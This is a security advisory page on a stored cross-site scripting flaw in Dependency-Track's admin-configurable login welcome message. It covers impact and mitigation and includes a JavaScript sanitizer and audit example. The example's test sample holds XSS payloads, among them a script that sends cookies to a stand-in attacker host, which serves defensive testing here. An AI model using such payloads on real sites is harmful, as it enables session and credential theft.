CVE-2025-64758: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in DependencyTrack frontend

Severity: Medium
Published: Mon Nov 17 2025 (11/17/2025, 17:24:27 UTC)
Source: CVE Database V5
Vendor/Project: DependencyTrack
Product: frontend

Description

@dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Since version 4.12.0, Dependency-Track users with the SYSTEM_CONFIGURATION permission can configure a "welcome message", which is HTML that is to be rendered on the login page for branding purposes. When rendering the welcome message, Dependency-Track versions before 4.13.6 did not properly sanitize the HTML, allowing arbitrary JavaScript to be executed. Users with the SYSTEM_CONFIGURATION permission (i.e., administrators), can exploit this weakness to execute arbitrary JavaScript for users browsing to the login page. The issue has been fixed in version 4.13.6.

AI-Powered Analysis

Last updated: 11/24/2025, 18:30:49 UTC

Technical Analysis

CVE-2025-64758 is a stored cross-site scripting (CWE-79) vulnerability in the frontend of Dependency-Track, an open-source software composition analysis platform widely used to manage software supply chain risk. Since version 4.12.0, users holding the SYSTEM_CONFIGURATION permission can set a custom HTML "welcome message" that is displayed on the login page for branding. In versions before 4.13.6 the frontend rendered that HTML without sanitizing it, so markup saved by such a user (script elements, event-handler attributes, javascript: URLs) executes as JavaScript in the application's origin for every visitor to the login page. Exploitation therefore requires SYSTEM_CONFIGURATION (in practice, administrator) access to store the malicious message; once stored, the payload runs without any further action by the attacker. Because the login page is where users type their credentials, a realistic payload captures those credentials or presents a convincing fake login flow; it can also perform actions in the application's origin on behalf of the visitor or pull in further payloads. The vulnerability affects versions from 4.12.0 up to but not including 4.13.6 and was publicly disclosed on November 17, 2025. The CVSS v3.1 base score is 4.8 (medium), reflecting a network attack vector, low attack complexity, high privileges required and required user interaction (a victim must visit the login page). No active exploitation has been reported. Version 4.13.6 fixes the issue by sanitizing the welcome message HTML before it is rendered. The weakness matters because Dependency-Track typically sits in environments that manage critical software supply chains, and because it lets a single privileged account silently run code in the browsers of every other user, including other administrators.

Potential Impact

For European organizations, this vulnerability primarily threatens the confidentiality and integrity of user credentials, sessions and, through them, sensitive configuration and vulnerability data held in Dependency-Track. If exploited, the injected script can capture the credentials of any user, including administrators, who signs in while the malicious message is in place, or manipulate the application interface shown to them, undermining trust in the software supply chain risk management process. This could lead to unauthorized access to vulnerability data, component inventories, or risk assessments, which are critical for compliance with regulations such as the EU Cybersecurity Act and the NIS Directive. The vulnerability does not directly affect availability, but compromised integrity and confidentiality could disrupt software supply chain security workflows. Organizations with stringent software supply chain security requirements, especially in finance, healthcare, and critical infrastructure, are at higher risk. The requirement for SYSTEM_CONFIGURATION privileges limits the attack surface, but an insider or a compromised administrator account could use the weakness to escalate from one privileged account to the credentials of every other user of the instance. The absence of known exploits reduces immediate risk but does not rule out targeted attacks.

Mitigation Recommendations

European organizations should upgrade Dependency-Track to version 4.13.6 or later as soon as possible. Until the upgrade is done, review the currently stored welcome message for unexpected markup and, if the feature is not needed, clear or disable it; restrict the SYSTEM_CONFIGURATION permission strictly to trusted administrators; and monitor for configuration changes, especially to the welcome message, including who made them and when. A Content Security Policy that disallows inline scripts and limits script sources will block the simplest payloads as defense in depth, but test it against the frontend first, since a single-page application may depend on inline scripts or eval. Audit the welcome message and any other configurable HTML fields on a regular schedule, looking for script elements, event-handler attributes (onload, onerror and similar), and javascript: or data: URLs. Require multi-factor authentication for administrator accounts to reduce the risk of credential compromise. Educate administrators that any HTML they store in branding fields is rendered in the browsers of all users. Finally, feed Dependency-Track's configuration-change and authentication events into the organization's broader security monitoring so that anomalous changes can be detected and investigated.
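The following is an added example, not code from the Dependency-Track project or from this advisory. It illustrates the weakness described under Technical Analysis (admin-supplied HTML handed to the page as markup) together with the allowlist sanitization that a fix relies on in principle, and it doubles as an audit helper for the "audit the welcome message" recommendation above. The tag and attribute allowlist, the helper names (sanitizeWelcomeHtml, auditWelcomeHtml, isSafeUrl) and the sample messages are assumptions constructed for this example; the project's actual fix is not reproduced here, and a production frontend should use a maintained DOM-based sanitizer such as DOMPurify rather than a hand-rolled tokenizer.

```javascript
// Added illustrative example (not Dependency-Track code): allowlist sanitization of an
// admin-supplied HTML "welcome message" before it is rendered on a login page.
// Allowlist contents and helper names are assumptions made for this example.
//
// Vulnerable pattern as the advisory describes it: the stored string is handed to the
// browser as markup, e.g. <div v-html="welcomeMessage"> in a Vue SPA (assumed pattern),
// so any <script>, on* handler or javascript: URL the admin saved runs in the
// application's origin for every visitor to the login page, before authentication.

const ALLOWED_TAGS = new Set(["a", "b", "br", "div", "em", "h1", "h2", "h3", "i", "img",
  "li", "ol", "p", "span", "strong", "u", "ul"]);
const VOID_TAGS = new Set(["br", "img"]);
// Elements whose content must be discarded as well, not just the tag itself.
const DROP_WITH_CONTENT = new Set(["script", "style", "iframe", "object", "embed", "svg",
  "math", "template", "noscript"]);
const GLOBAL_ATTRS = new Set(["title", "class"]);
const TAG_ATTRS = { a: new Set(["href"]), img: new Set(["src", "alt"]) };
const URL_ATTRS = new Set(["href", "src"]);

const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/y; // sticky: match a tag at lastIndex
const ATTR_RE = /([^\s=\/"'<>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'<>`]+)))?/g;

const escapeText = (s) => s.replace(/[<>]/g, (c) => (c === "<" ? "&lt;" : "&gt;"));
// '&' is escaped too, so an entity trick such as javascript&colon; can never decode
// into a working scheme after the value is re-emitted.
const escapeAttr = (s) =>
  s.replace(/[&"<>]/g, (c) => ({ "&": "&amp;", '"': "&quot;", "<": "&lt;", ">": "&gt;" })[c]);

function isSafeUrl(value) {
  // Strip ASCII control characters and whitespace first: "java\tscript:" is still javascript:
  const v = value.replace(/[\u0000-\u0020\u007f]/g, "").toLowerCase();
  // Allow http(s), mailto, site-relative and fragment URLs, or anything with no scheme at all.
  return /^(?:https?:\/\/|mailto:|\/|#|[^:]*$)/.test(v);
}

function sanitizeAttrs(tag, raw, findings) {
  let out = "";
  for (const m of raw.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    const allowed = GLOBAL_ATTRS.has(name) || (TAG_ATTRS[tag] ?? new Set()).has(name);
    if (!allowed) { findings.push(`dropped attribute ${name} on <${tag}>`); continue; } // on*, style, srcdoc...
    if (URL_ATTRS.has(name) && !isSafeUrl(value)) {
      findings.push(`dropped unsafe URL in ${name} on <${tag}>`);
      continue;
    }
    out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

// Returns markup that is safe to bind to innerHTML / v-html. `findings` collects what was removed.
function sanitizeWelcomeHtml(html, findings = []) {
  let out = "";
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf("<", i);
    if (lt === -1) { out += escapeText(html.slice(i)); break; }
    out += escapeText(html.slice(i, lt));
    TAG_RE.lastIndex = lt;
    const m = TAG_RE.exec(html);
    if (!m) { out += "&lt;"; i = lt + 1; continue; } // a bare '<' is just text
    const [whole, slash, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    i = lt + whole.length;
    if (!slash && DROP_WITH_CONTENT.has(name)) {
      findings.push(`dropped tag <${name}> and its content`);
      const close = new RegExp(`</${name}\\b`, "ig");
      close.lastIndex = i;
      const c = close.exec(html);
      i = c ? c.index : html.length; // the closing tag itself is dropped on the next round
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) {
      if (!slash) findings.push(`dropped tag <${name}>`);
      continue; // tag removed, its inner text survives as plain text
    }
    if (slash) { if (!VOID_TAGS.has(name)) out += `</${name}>`; continue; }
    out += `<${name}${sanitizeAttrs(name, rawAttrs, findings)}>`;
  }
  return out;
}

// Audit helper for a stored message: lists the constructs the sanitizer would remove.
function auditWelcomeHtml(html) {
  const findings = [];
  sanitizeWelcomeHtml(html, findings);
  return findings;
}

// Constructed sample of what a malicious SYSTEM_CONFIGURATION holder might store.
const ATTACKER_WELCOME =
  '<h2>Welcome to ACME</h2>' +
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' +
  '<img src=x onerror="alert(1)">' +
  '<a href="JaVaScRiPt:alert(1)">Docs</a>' +
  '<p style="background:url(javascript:alert(1))">Please sign in.</p>';

// Constructed sample of legitimate branding markup.
const BENIGN_WELCOME =
  '<p>Welcome to <strong>ACME</strong> Dependency-Track. See the ' +
  '<a href="https://intranet.example/dt-policy" title="Policy">usage policy</a>.</p>';

console.log(sanitizeWelcomeHtml(ATTACKER_WELCOME));
console.log(auditWelcomeHtml(ATTACKER_WELCOME));
console.log(auditWelcomeHtml(BENIGN_WELCOME));
```

Run with node. The attacker sample comes out as plain branding (`<h2>Welcome to ACME</h2><img src="x"><a>Docs</a><p>Please sign in.</p>`) with four findings, while the benign sample passes through unchanged with no findings. The audit helper can be pointed at the welcome message value exported from a running instance to check it before an upgrade; anything it reports is a reason to look at who changed the setting.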


Technical Details

Data Version
5.2
Assigner Short Name
GitHub_M
Date Reserved
2025-11-10T22:29:34.875Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 691b5ce0c08982598af07859

Added to database: 11/17/2025, 5:35:28 PM

Last enriched: 11/24/2025, 6:30:49 PM

Last updated: 1/7/2026, 6:10:41 AM

